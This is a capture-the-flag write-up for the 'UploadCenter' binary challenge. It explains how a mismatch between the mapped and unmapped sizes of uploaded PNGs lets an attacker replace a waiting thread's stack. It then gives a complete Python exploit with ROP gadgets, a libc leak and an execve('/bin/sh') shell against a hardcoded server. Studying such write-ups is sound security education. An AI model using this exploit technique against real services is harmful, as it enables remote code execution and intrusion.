Welcome to another Menu Chall right~
Here you can use any function as you wish
No more words , Let’t begin
1 π Fill your information
2 π Upload and parse File
3 π Show File info
4 π Delete File
5 π Commit task
6 π Monitor File
UploadCenter was a small service (x86-64, Linux) that allowed you to upload PNG files and do nothing with them. Well, that’s not entirely true – you could list them (it would show you their width/height and depth), remove them and spawn two kinds of threads (one would inform you about any new uploads – i.e. when you would upload a file it would tell you that you’ve uploaded a file; and the second one would just list all the files in a different thread).
The PNGs themselves were kept on a linked list, where each node would contain (in short) some basic information about the PNG, a pointer to mmap’ed memory where the PNG was placed, and the size of said mmap’ed memory area.
The critical parts of the task were related to three menu options: 2 (upload), 4 (delete) and 6 (monitor), so I’ll focus on them.
Starting with the most boring one, 4 π Delete File function removed the specified PNG from the linked list, unmapped the memory chunk and freed all the structures (PNG descriptor, list node). As far as I’m concerned it was correctly implemented and for the sake of this write up the most interesting part was the munmap call:
munmap(i->mmap_addr, i->mmap_size);
Going to the next function, 6 π Monitor File spawned a new thread, which (in an infinite loop) waited for a condition to be met (new file uploaded) and displayed a message. It basically boiled down to the following code:
while ( !pthread_mutex_lock(&mutex) )
{
while ( !ev_file_added )
pthread_cond_wait(&cond, &mutex);
…
puts(“New file uploaded, Please check”);
…
}
And the last, and most important part, was the 2 π Upload and parse File function, which worked in the following way:
- It asked the user for a 32-bit word containing data size (limited at 1 MB).
- And then received that many bytes from the user.
- Then inflated (i.e. zlib decompressed) the data (limited at 32 MB).
- And did some simplistic PNG format parsing (which, apart from the width and height, could basically be ignored).
- After that it mmap’ed an area of size width * height (important!) and copied that amount of decompressed data there.
- And then it set entry->mmap_size to the size of decompressed data (so there was a mismatch between what was mapped,and what would be unmapped when deleting).
So actually what you could do (using functions 2 and 4) is unmap an adjacent area of memory to one of the PNG areas. But how to get code execution from that?
At this moment I would like to recommend this awesome blogpost (kudos to mak for handing me a link during the CTF): http://tukan.farm/2016/07/27/munmap-madness/
The method I used is exactly what is described there, i.e.:
- I’ve allocated two 8 MB areas (i.e. uploaded two PNGs), where one area was described correctly as 8 MB and the other incorrectly as 16 MB block,
- I’ve freed the correctly allocated one (i.e. deleted it from the list).
- And then I used option 6 to launch a new thread. The stack of the new thread was placed exactly in the place of the PNG I just unmapped.
- And then I’ve unmapped the second PNG, which actually unmapped the stack of the new thread as well (these areas were next to each over). Since the thread was waiting for a mutex it didn’t crash.
- At that moment it was enough to upload a new 8 MB PNG that contained the “new stack” (with ROP chain + some minor additions) for the new thread (upload itself would wake the thread) and the woken thread would eventually grab a return address from the now-controlled-by-us stack leading to code execution.
The exploit (you’ll probably have to run it a couple of times):
#!/usr/bin/python
import sys
import socket
import telnetlib
import os
import time
from struct import pack, unpack
def recvuntil(sock, txt):
d = “”
while d.find(txt) == -1:
try:
dnow = sock.recv(1)
if len(dnow) == 0:
print “-=(warning)=- recvuntil() failed at recv”
print “Last received data:”
print d
return False
except socket.error as msg:
print “-=(warning)=- recvuntil() failed:”, msg
print “Last received data:”
print d
return False
d += dnow
return d
def recvall(sock, n):
d = “”
while len(d) != n:
try:
dnow = sock.recv(n – len(d))
if len(dnow) == 0:
print “-=(warning)=- recvuntil() failed at recv”
print “Last received data:”
print d
return False
except socket.error as msg:
print “-=(warning)=- recvuntil() failed:”, msg
print “Last received data:”
print d
return False
d += dnow
return d
# Proxy object for sockets.
class gsocket(object):
def __init__(self, *p):
self._sock = socket.socket(*p)
def __getattr__(self, name):
return getattr(self._sock, name)
def recvall(self, n):
return recvall(self._sock, n)
def recvuntil(self, txt):
return recvuntil(self._sock, txt)
# Base for any of my ROPs.
def db(v):
return pack(“<B”, v)
def dw(v):
return pack(“<H”, v)
def dd(v):
return pack(“<I”, v)
def dq(v):
return pack(“<Q”, v)
def rb(v):
return unpack(“<B”, v[0])[0]
def rw(v):
return unpack(“<H”, v[:2])[0]
def rd(v):
return unpack(“<I”, v[:4])[0]
def rq(v):
return unpack(“<Q”, v[:8])[0]
def upload_file(s, fname):
with open(fname, “rb”) as f:
d = f.read()
return upload_string(s, d)
def png_header(magic, data):
return ”.join([
pack(“>I”, len(data)),
magic,
data,
pack(“>I”, 0x41414141), # CRC
])
def make_png(w, h):
return ”.join([
“89504E470D0A1A0A”.decode(“hex”), # Magic
png_header(“IHDR”,
pack(“>IIBBBBB”,
w, h, 8, 2, 0, 0, 0 # 24-bit RGB
)),
png_header(“IDAT”, “”),
png_header(“IEND”, “”),
])
def upload_png(s, w, h, final_sz, padding=””, pbyte=”A”):
png = make_png(w, h)
while len(png) % 8 != 0:
png += “\0”
png += padding
print len(png), final_sz
png = png.ljust(final_sz, pbyte)
png = png.encode(“zlib”)
if len(png) > 1048576:
print “!!!!!!! ZLIB: %i vs %i” % (len(png), 1048576)
s.sendall(“2\n”)
s.sendall(dd(len(png)))
s.sendall(png)
print s.recvuntil(MENU_LAST_LINE)
def upload_string(s, d):
z = d.encode(“zlib”)
s.sendall(dd(len(z)))
s.sendall(z)
def upload_file_padded(s, fname, padding):
with open(fname, “rb”) as f:
d = f.read()
return upload_string(s, d + padding)
MENU_LAST_LINE = “6 π Monitor File\n”
READ_INFO_LAST_LINE = “enjoy your tour\n”
def del_entry(s, n):
s.sendall(“4\n”)
s.sendall(str(n) + “\n”)
print s.recvuntil(MENU_LAST_LINE)
def spawn_monitor(s):
s.sendall(“6\n”)
print s.recvuntil(MENU_LAST_LINE)
def set_rdi(v):
# 0x4038b1 pop rdi
# 0x4038b2 ret
return ”.join([
dq(0x4038b1),
dq(v)
])
def set_rsi_r15(rsi=0, r15=0):
# 0x4038af pop rsi
# 0x4038b0 pop r15
# 0x4038b2 ret
return ”.join([
dq(0x4038af),
dq(rsi),
dq(r15),
])
def call_puts(addr):
# 0400AF0
return ”.join([
set_rdi(addr),
dq(0x0400AF0),
])
def call_read_bytes(addr, sz):
# 400F14
return ”.join([
set_rdi(addr),
set_rsi_r15(rsi=sz),
dq(0x400F14),
])
def stack_pivot(addr):
# 0x402ede pop rsp
# 0x402edf pop r13
# 0x402ee1 ret
return ”.join([
dq(0x402ede),
dq(addr – 8)
])
def call_sleep(tm):
return ”.join([
set_rdi(tm),
dq(0x400C30),
])
def go():
global HOST
global PORT
s = gsocket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# Put your code here!
print s.recvuntil(MENU_LAST_LINE)
#s.sendall(“1\n”)
#s.sendall(“A” * 20)
#s.sendall(“1\n”)
#print s.recvuntil(READ_INFO_LAST_LINE)
#s.sendall(“0000000000000001A”)
#s.sendall(“B” * 1) # 2, 8
#time.sleep(0.5)
#s.sendall(“1\n”)
#d = s.recvuntil(READ_INFO_LAST_LINE)
#print d
#sth = d.split(” , enjoy your tour”)[0].split(“Welcome Team “)[1]
#print sth.encode(“hex”)
upload_png(s, 10, 10, 0x1000)
upload_png(s, 1, 8392704, 8392704) # 1
upload_png(s, 1, 8392704, 8392704 + 8392704)
del_entry(s, 1)
spawn_monitor(s)
del_entry(s, 1)
# Now we hope that not all threads run.
padding = []
for i in range((8392704 – 128) / 8): # ~1mln
if i < 900000:
padding.append(dq(0))
else:
padding.append(dq(0x4141414100000000 | i))
padding[0xfffd9] = dq(0x0060E400)
padding[0xfffda] = dq(0x0060E400)
del padding[0xfffdd:]
VER = 0x4098DC
VER_STR = “1.2.8\n”
CMD = “/bin/sh\0”
#CMD = CMD.ljust(64, “\0”)
rop = ”.join([
call_sleep(1),
call_puts(VER),
call_puts(0x060E028),
call_puts(0x060E029),
call_puts(0x060E02A),
call_puts(0x060E02B),
call_puts(0x060E02C),
call_puts(0x060E02D),
call_puts(0x060E02E),
call_puts(0x060E02F),
call_puts(VER),
call_read_bytes(0x0060E400, 512 + len(CMD)),
stack_pivot(0x0060E410)
])
padding.append(rop)
padding = ”.join(padding)
#print “press enter to trigger”
#raw_input()
print “\x1b[1;33mTriggering!\x1b[m”
upload_png(s, 1, 8392704, 8392704, padding)
s.recvuntil(VER_STR)
puts_libc = ”
for x in s.recvuntil(VER_STR).splitlines():
if len(x) == 0:
puts_libc += “\0”
else:
puts_libc += x[0]
if len(puts_libc) == 8:
break
puts_libc = rq(puts_libc)
LIBC = puts_libc – 0x06B990
print “LIBC: %x” % LIBC
rop2 = ”.join([
#dq(0x402ee1) * 16, # nopsled
dq(0x401363) * 16,
set_rsi_r15(0x0060EF00, 0),
set_rdi(0x0060E400 + 512),
dq(LIBC+0xBA310), # execve
])
rop2 = rop2.ljust(512, “\0”)
rop2 += CMD * 16
s.sendall(“PPPPPPPP” + rop2 + (” ” * 16))
# Interactive sockets.
t = telnetlib.Telnet()
t.sock = s
t.interact()
# Python console.
# Note: you might need to modify ReceiverClass if you want
# to parse incoming packets.
#ReceiverClass(s).start()
#dct = locals()
#for k in globals().keys():
# if k not in dct:
# dct[k] = globals()[k]
#code.InteractiveConsole(dct).interact()
s.close()
HOST = ‘202.120.7.216’
PORT = 12345
#HOST = ‘127.0.0.1’
#HOST = ‘192.168.2.218’
#PORT = 1234
go()